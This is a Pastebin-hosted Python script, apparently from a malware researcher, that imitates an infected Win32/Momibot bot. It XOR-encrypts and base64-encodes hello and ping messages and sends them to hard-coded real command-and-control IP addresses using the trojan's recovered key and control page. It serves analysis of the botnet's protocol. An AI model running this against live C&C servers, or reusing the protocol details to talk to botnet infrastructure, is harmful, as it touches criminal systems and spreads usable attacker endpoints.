SHARE
TWEET

MomiComm.py

dah4cker Aug 10th, 2011 148 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # DaH4cKeR : 09-Aug-2011
  3. # Script : MomiComm.py
  4. # http://hypersecurity.blogspot.com
  5. #
  6. # Script to communicate with Win32/Momibot Trojan. It will send &
  7. # receive commands from the C&C server and display all responses (XML)
  8. # in clear text.
  9. #
  10. # http://www.microsoft.com/security/portal/Entry.aspx?name=Backdoor:Win32/Momibot.gen!B
  11. #
  12. # Cheers,
  13. # @DaH4cker
  14. #
  15. #######################################################################################
  16.  
  17. #CnC="212.124.123.98:80"        #Sample MD5: 108da66dfa28a790a08be1965a2df8c2
  18. #CnC="184.105.178.85:80"        #Sample MD5: 2a593a1ead30ee30017d71bd18d9e66b
  19. CnC="203.146.253.110:8090"      #Sample MD5: 598417359361205d9c2a1892e3a31c13
  20.  
  21. # All the samples I analyzed so far seem to be using the following XOR key
  22. # and PHP pages for communication.
  23.  
  24. cntrl_page="/v4/index.php"
  25. #cntrl_page="/v5/index.php"
  26. XOR_key="\x53"
  27.  
  28. ################### Modify beyond this at your own risk ! #####################
  29.  
  30.  
  31. import base64
  32. import httplib
  33.  
  34. def encrypt(msg, key):
  35.         data = ''
  36.         for char in msg:
  37.                 char = chr(ord(char) ^ ord(key))
  38.                 data += char
  39.         enc = base64.b64encode(data)
  40.         return enc
  41.  
  42. def decrypt(msg, key):
  43.         try:
  44.                 dec = base64.b64decode(msg)
  45.                 data = ''
  46.                 for char in dec:
  47.                         char = chr(ord(char) ^ ord(key))
  48.                         data += char
  49.                 return data
  50.         except Exception:
  51.                 return "Invalid or Unknown Response"
  52.  
  53. def send_receive(params):
  54.         try:
  55.                 conn = httplib.HTTPConnection(CnC)
  56.                 headers = {"Content-Type": "text/xml"}
  57.                 conn.request("POST", cntrl_page, params, headers)
  58.                 resp = conn.getresponse()
  59.         except Exception,err:
  60.                 return "Timed Out - "+str(err)
  61.         if resp.status == 200:
  62.                 data = decrypt(resp.read(),XOR_key)
  63.         else:
  64.                 data = str(resp.status)+" "+resp.reason
  65.         conn.close()
  66.         return data
  67.  
  68. if __name__ == "__main__":
  69.         hello_msg = "<root><binfo id=\'3559939039\' nt=\'1\' bv=\'4.6\' lt=\'LAN\' os=\'Windows XP Professional\'> </binfo></root>"
  70.         ping_msg = "<root><ping id=\'3559939039\'/></root>"
  71.  
  72.         test1 = encrypt(hello_msg, XOR_key)
  73.         print "Sending hello packet.."
  74.         print "Response: "+send_receive(test1)
  75.  
  76.         test2 = encrypt(ping_msg, XOR_key)
  77.         print "Sending ping packet.."
  78.         print "Response: "+send_receive(test2)
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top